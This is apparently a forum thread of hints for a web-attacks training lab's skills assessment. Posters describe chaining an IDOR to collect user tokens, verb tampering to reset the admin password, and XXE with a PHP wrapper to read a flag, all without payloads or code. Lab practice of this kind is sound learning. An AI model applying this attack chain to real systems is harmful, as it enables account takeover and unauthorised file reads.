Can somebody help me for the skills assessment? I discovered the XXE and I got it working , but i can’t get any LFI no matter what payload i am using (SYSTEM keyword seems blacklisted or something).
Thanks very much.
I think you should use php wrapper to read the flag
hello bro.how do you do ?can u help me with this please?i found a way to reset users passwords.but how can i use this with xxe?
Did you exploit IDOR vulnerability completely?
You have to detect the field what you can perform xxe (name, details, date) then use php wrapper to read the flag, it’s mentioned perivous sections
1 Like
yes i detect that it give me id,username,fullname and company.but when i try to change them or add new user it didnt work.i also try with xxeinjector tool and static but it didnt get me anythings
first, you need to exploit the idor vuln and get a privileged user!
next, exploit the XXE vuln with the right privileged user!
note: XXE vulnerability is the basic vuln in this case
4 Likes
oh man .thank you so much.i solve that.that was so fun.you are always my guidance.thank you brother.love you
1 Like
I can’t find a way to reset the passwords. Can you help?
idor vulnerability bro
what did you do for the XXE?
Thanks for the tips and hints, very valuable!
Do I understand correctly that without Cookie: PHPSESSID it will not be possible to change the administrator password?
The funny thing is, I have:
uid:
username:
token:
PHPSESSID=
But the password stubbornly does not want to be reset by the user)
Access Denied
Hint what I’m doing wrong.
Resetting via request:
POST /reset.php
I am also blocked here
2 Likes
I actually got this. Not sure why though
@discovolante, not sure if you are both stuck on this same part. But look at what I have quoted here, take a look at the module topics again, and ask yourself if you have tried everything! The key to your issues lies in what I have quoted, solve that and you should be able to move on.
If that was too cryptic, then feel free to DM me.
-onthesauce
5 Likes
I am also stuked here, I have already got all the 100 users and tokens, there is one of then that seens to be the administrator. The bad part is that the IDOR example on module doesn’t require autenthication or a privilage escalation… 
2 Likes
Don’t fall into a forum trap believing that the whole process of privilege escalation is IDOR! You may use IDOR to figure out all the information you need for the privilege escalation, but there were other concepts taught in the Web Attacks module that will help as well.
4 Likes
If anyone is stuck trying to change the admin password, don’t forget verb tampering!
However, once I can log into the admin account I’m stuck because I can’t find where xml is being used. Am I blind and it’s super obvious? Or do you have to try giving XML to different URIs and see what happens?
1 Like
Try all the functions in the admin account, its been awhile, but I believe there was some extra calendar functions on the elevated account.
3 Likes
Finally mastered this module))
a decent assessment of skills.
(thanks a lot to everyone for mentoring)